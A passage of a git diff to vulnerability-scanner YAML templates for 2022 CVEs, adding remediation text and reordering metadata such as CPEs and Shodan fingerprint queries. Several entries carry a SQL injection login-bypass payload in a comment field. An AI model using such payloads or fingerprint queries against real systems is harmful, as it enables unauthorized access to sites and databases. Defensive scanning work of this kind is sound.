Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-32025 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" verified: true + max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"Car Rental Management System" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 0fc20e45a4..7c8d83ff89 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-32026 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" verified: true + max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"Car Rental Management System" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index ca39e3c5bf..83094f935a 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-32028 cwe-id: CWE-89 epss-score: 0.00618 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.76135 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" verified: true + max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system + shodan-query: http.html:"Car Rental Management System" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index a7197b4b71..7ebd9c0927 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/Danie1233/Hospital-Management-System-v1.0-SQLi-3/ - https://nvd.nist.gov/vuln/detail/CVE-2022-32094 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-32094 cwe-id: CWE-89 epss-score: 0.01018 - cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.81899 + cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Hospital Management System" verified: true + max-request: 1 vendor: hospital_management_system_project product: hospital_management_system + shodan-query: http.html:"Hospital Management System" tags: cve,cve2022,hms,cms,sqli,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 5205abbf97..150fe4a483 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL. + remediation: | + Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability. reference: - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408 - https://github.com/edx @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-32195 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* epss-percentile: 0.4045 + cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: - max-request: 1 - comment: Hover the cursor on the redirect link - shodan-query: http.html:"Open edX" verified: true + max-request: 1 vendor: edx product: open_edx + shodan-query: http.html:"Open edX" + comment: Hover the cursor on the redirect link tags: cve,cve2022,openedx,xss http: diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 0daed12bb6..eb9add1445 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + remediation: | + Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. reference: - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-32409 cwe-id: CWE-22 epss-score: 0.5824 - cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* epss-percentile: 0.97277 + cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"i3geo" verified: true + max-request: 1 vendor: softwarepublico product: i3geo + shodan-query: http.html:"i3geo" tags: cve,cve2022,i3geo,lfi http: diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 26c383f2e1..0426048bcc 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html - https://elifulkerson.com/CVE-2022-32429/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-32429 cwe-id: CWE-287 epss-score: 0.02276 - cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* epss-percentile: 0.88224 + cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 verified: true + max-request: 1 vendor: megatech product: msnswitch_firmware + shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch http: diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index b9bd66dd54..2c1020d733 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + remediation: | + Apply the latest patch or update to a version that has fixed this vulnerability. reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 @@ -15,8 +17,8 @@ info: cve-id: CVE-2022-32444 cwe-id: CWE-601 epss-score: 0.00285 - cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* epss-percentile: 0.64698 + cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: yuba diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 03546aa711..db01ef2113 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-32770 cwe-id: CWE-79 epss-score: 0.00103 - cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* epss-percentile: 0.41266 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"AVideo" verified: true + max-request: 1 vendor: wwbn product: avideo + shodan-query: http.html:"AVideo" tags: cve,cve2022,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 7c42dcfb48..6e0be3c7dd 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-32771 cwe-id: CWE-79 epss-score: 0.00056 - cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* epss-percentile: 0.21205 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"AVideo" verified: true + max-request: 1 vendor: wwbn product: avideo + shodan-query: http.html:"AVideo" tags: cve,cve2022,avideo,xss http: diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 8dcb8d66f8..34a5987cdf 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-32772 cwe-id: CWE-79 epss-score: 0.00056 - cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* epss-percentile: 0.21205 + cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"AVideo" verified: true + max-request: 1 vendor: wwbn product: avideo + shodan-query: http.html:"AVideo" tags: cve,cve2022,avideo,xss,wwbn http: diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index 0d76389343..cc50190b75 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. reference: - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-33119 cwe-id: CWE-79 epss-score: 0.02006 - cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* epss-percentile: 0.87424 + cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"NVRsolo" verified: true + max-request: 1 vendor: nuuo product: nvrsolo_firmware + shodan-query: http.html:"NVRsolo" tags: cve,cve2022,nvrsolo,xss http: diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 0c4b1f8b75..7af5c0ab0c 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + remediation: | + Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability. reference: - https://gynvael.coldwind.pl/?lang=en&id=748 - https://nvd.nist.gov/vuln/detail/CVE-2022-33174 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-33174 cwe-id: CWE-863 epss-score: 0.00505 - cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.73487 + cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Powertek" verified: true + max-request: 1 vendor: powertekpdus product: basic_pdu_firmware + shodan-query: http.html:"Powertek" tags: cve,cve2022,powertek,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 4fdd1dc3e1..84ab50d86e 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1. + remediation: | + Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability. reference: - https://github.com/W01fh4cker/cve-2022-33891 - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-33891 cwe-id: CWE-78 epss-score: 0.97023 - cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* epss-percentile: 0.99632 + cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Spark Master at" verified: true + max-request: 1 vendor: apache product: spark + shodan-query: title:"Spark Master at" tags: cve2022,apache,spark,authenticated,kev,packetstorm,cve variables: command: "echo CVE-2022-33891 | rev" diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 5492d38f2d..43f3120f3a 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later. reference: - https://wordpress.org/plugins/multisafepay/ - https://wordpress.org/plugins/multisafepay/#developers @@ -16,14 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33901 epss-score: 0.00713 - cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.78038 + cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: multisafepay product: multisafepay_plugin_for_woocommerce + framework: wordpress tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce http: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 2236dd244c..26c52cdbf5 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability. reference: - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities - https://wordpress.org/plugins/wp-stats-manager/ @@ -17,15 +19,15 @@ info: cve-id: CVE-2022-33965 cwe-id: CWE-89 epss-score: 0.0098 - cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* epss-percentile: 0.81511 + cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:"/wp-content/plugins/wp-stats-manager" verified: true - framework: wordpress + max-request: 1 vendor: plugins-market product: wp_visitor_statistics + framework: wordpress + google-query: inurl:"/wp-content/plugins/wp-stats-manager" tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager http: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index af812b5753..f7fba31b34 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing - https://nvd.nist.gov/vuln/detail/CVE-2022-34045 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-34045 cwe-id: CWE-798 epss-score: 0.02393 - cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* epss-percentile: 0.8849 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"WN530HG4" verified: true + max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware + shodan-query: http.html:"WN530HG4" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index c5a44b4e60..a67b6bb4ed 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-34046 cwe-id: CWE-863 epss-score: 0.22828 - cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* epss-percentile: 0.95888 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wn533a8_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: packetstorm,cve,cve2022,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index bd90f7ce7f..158a3a876c 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-34047 cwe-id: CWE-668 epss-score: 0.24505 - cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* epss-percentile: 0.9601 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: cve2022,wavlink,router,exposure,packetstorm,cve http: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 10dc812f78..30f6a907ca 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50989 - https://drive.google.com/file/d/1xznFhH3w3TDN2RCdX62_ebylR4yaKmzf/view?usp=sharing @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-34048 cwe-id: CWE-79 epss-score: 0.0009 - cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* epss-percentile: 0.37601 + cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"Wavlink" verified: true + max-request: 1 vendor: wavlink product: wn533a8_firmware + shodan-query: http.html:"Wavlink" tags: cve2022,wavlink,xss,router,edb,cve http: diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index c7296ee39c..422d357e59 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-34049 cwe-id: CWE-552 epss-score: 0.17531 - cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* epss-percentile: 0.95436 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Wi-Fi APP Login" verified: true + max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware + shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2022,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index e3068e4155..5d50f2a3fa 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php. + remediation: | + Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability. reference: - https://github.com/hansmach1ne/MyExploits/tree/main/LFI_in_CuppaCMS_templates - https://github.com/CuppaCMS/CuppaCMS/issues/18 @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-34121 cwe-id: CWE-829 epss-score: 0.71421 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.97623 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: cuppacms product: cuppacms tags: cve,cve2022,lfi,cuppa,cms diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index 84f87b78be..a5f21f2eff 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: - https://github.com/jenaye/PMB/blob/main/README.md - https://github.com/jenaye/PMB @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-34328 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:* epss-percentile: 0.40272 + cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"PMB Group" verified: true + max-request: 1 vendor: pmb_project product: pmb + shodan-query: http.html:"PMB Group" tags: cve,cve2022,pmb,xss http: diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index ca45419326..8c402cd042 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-34576 @@ -14,14 +16,14 @@ info: cvss-score: 7.5 cve-id: 